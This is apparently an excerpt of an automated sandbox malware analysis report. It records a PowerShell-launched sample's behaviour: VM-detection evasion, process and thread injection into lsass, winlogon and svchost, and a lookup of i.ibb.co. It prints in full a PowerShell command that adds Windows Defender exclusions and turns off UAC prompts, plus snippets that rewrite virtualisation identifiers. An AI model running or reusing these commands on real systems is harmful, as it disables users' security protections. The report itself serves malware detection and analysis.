Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed

Source: C:\ProgramData\SVrB5SO0.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E6D7B0 FindFirstFileExW,	2_2_000001CB53E6D7B0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC4D7B0 FindFirstFileExW,	7_2_000001498BC4D7B0
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB4297D7B0 FindFirstFileExW,	20_2_000001EB4297D7B0
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF969D7B0 FindFirstFileExW,	21_2_0000018AF969D7B0
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB7D7B0 FindFirstFileExW,	22_2_000002D6CEB7D7B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599875
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599764
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599656
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599547
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599436
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599301
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599179
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 599061
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598953
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598844
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598734
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598625
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598516
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598403
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598296
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598187
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 598078
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597969
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597844
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597734
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597625
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597516
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597391
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597266
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597156
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 597045
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596937
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596827
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596715
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596608
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596500
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596391
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596266
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596141
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 596031
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595922
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595813
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595688
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595578
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595469
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595359
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595247
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595140
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 595031
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594922
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594813
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594688
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594578
Source: C:\ProgramData\SVrB5SO0.exe	Thread delayed: delay time: 594469
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: svchost.exe, 0000001F.00000000.1433505062.000001EA1762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2445116456.000001EA1762B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: lsass.exe, 00000016.00000000.1355733785.000002D6CDC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 0000001F.00000002.2445116456.000001EA1762B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@vmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.31.dr	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000001C.00000000.1419692615.0000015D29E2B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.31.dr	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000004.00000002.2482005243.0000014F1C857000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.31.dr	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>ons
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.31.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.31.dr	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.31.dr	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: svchost.exe, 00000004.00000002.2442619407.0000014F1722B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.31.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.31.dr	Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Microsoft-Windows-PowerShell%4Operational.evtx.31.dr	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: powershell.exe, 00000003.00000002.1368155002.0000000007488000.00000004.00000020.00020000.00000000.sdmp, SVrB5SO0.exe, 0000000F.00000002.2423398773.0000000001176000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1355597047.000002D6CDC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2433868139.000002D6CDC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1361542826.000002566B613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2427102614.000002566B613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2425393755.000001D42C82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1411020042.000001D42C82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2422535725.000001CB5E42A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000000.1412896266.000001CB5E42A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2437102826.0000015D29E41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000017.00000000.1361619575.000002566B62A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@:ckV
Source: dwm.exe, 00000018.00000000.1372440902.000001A525B20000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.31.dr	Binary or memory string: VMCI: Using capabilities (0x1c).
Source: lsass.exe, 00000016.00000000.1355733785.000002D6CDC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-PowerShell%4Operational.evtx.31.dr	Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: svchost.exe, 0000001F.00000000.1433365617.000001EA175D0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a
Source: lsass.exe, 00000016.00000000.1355733785.000002D6CDC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmicheartbeatLMEM
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.31.dr	Binary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.31.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1ae
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.31.dr	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000003.00000002.1367187974.000000000741A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5i
Source: svchost.exe, 0000001F.00000003.1445702145.000001EA19072000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmcir:m
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.31.dr	Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Microsoft-Windows-PowerShell%4Operational.evtx.31.dr	Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000028.00000002.2422030400.00000242BC602000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000016.00000000.1355733785.000002D6CDC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: Microsoft-Windows-Ntfs%4Operational.evtx.31.dr	Binary or memory string: VMware
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.31.dr	Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: svchost.exe, 0000001F.00000000.1435581249.000001EA19000000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmciRe
Source: Microsoft-Windows-PowerShell%4Operational.evtx.31.dr	Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000003.00000002.1374292555.0000000008B56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Microsoft-Windows-PowerShell%4Operational.evtx.31.dr	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000018.00000002.2520001003.000001A525B87000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.31.dr	Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))

Source: C:\Windows\System32\dllhost.exe

API call chain: ExitProcess graph end node

graph_20-8181

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\notepad.exe

Code function: 2_2_000001CB53E681B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_000001CB53E681B0

Source: C:\Windows\System32\notepad.exe

Code function: 2_2_000001CB53E6162C GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey,

2_2_000001CB53E6162C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\j3owB.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NwhPywLp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\SVrB5SO0.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug

Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E681B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001CB53E681B0
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E6CD74 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000001CB53E6CD74
Source: C:\Windows\System32\notepad.exe	Code function: 2_2_000001CB53E68514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000001CB53E68514
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC481B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_000001498BC481B0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC4CD74 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_000001498BC4CD74
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 7_2_000001498BC48514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_000001498BC48514
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB42978514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	20_2_000001EB42978514
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB4297CD74 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001EB4297CD74
Source: C:\Windows\System32\dllhost.exe	Code function: 20_2_000001EB429781B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_000001EB429781B0
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF96981B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0000018AF96981B0
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF969CD74 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0000018AF969CD74
Source: C:\Windows\System32\winlogon.exe	Code function: 21_2_0000018AF9698514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0000018AF9698514
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB78514 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_000002D6CEB78514
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB781B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000002D6CEB781B0
Source: C:\Windows\System32\lsass.exe	Code function: 22_2_000002D6CEB7CD74 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_000002D6CEB7CD74

Source: C:\ProgramData\SVrB5SO0.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: i.ibb.co

Yara detected Powershell download and execute

Source: Yara match	File source: script.ps1, type: SAMPLE
Source: Yara match	File source: amsi32_7616.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7836.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: notepad.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1172, type: MEMORYSTR

.NET source code contains process injector

Source: 16.2.cZp98.exe.3140b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 16.0.cZp98.exe.3140b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 17.2.powershell.exe.26a5a220df0.10.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 17.2.powershell.exe.26a628f0000.16.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: SVrB5SO0.exe.3.dr, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 16.2.cZp98.exe.3140b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 16.2.cZp98.exe.3140b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 16.2.cZp98.exe.3140b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 16.2.cZp98.exe.3140b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 16.2.cZp98.exe.3140b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 20_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

20_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: F9662AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: CEB42AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6C212AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: 29D52AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: CA932AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2C7C2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5EA92AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2A5D2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A5192AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9862AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 17CA2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: D60C2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5A1A2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C17A2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 85182AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3A7B2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 29B2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5E2F2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 19B52AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BD152AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: C0592AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 68DA2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3EBB2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BD962AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 94DC2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 3C1D2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3F332AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C0862AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 74FD2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F12AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF32AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F7DA2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E112AD0
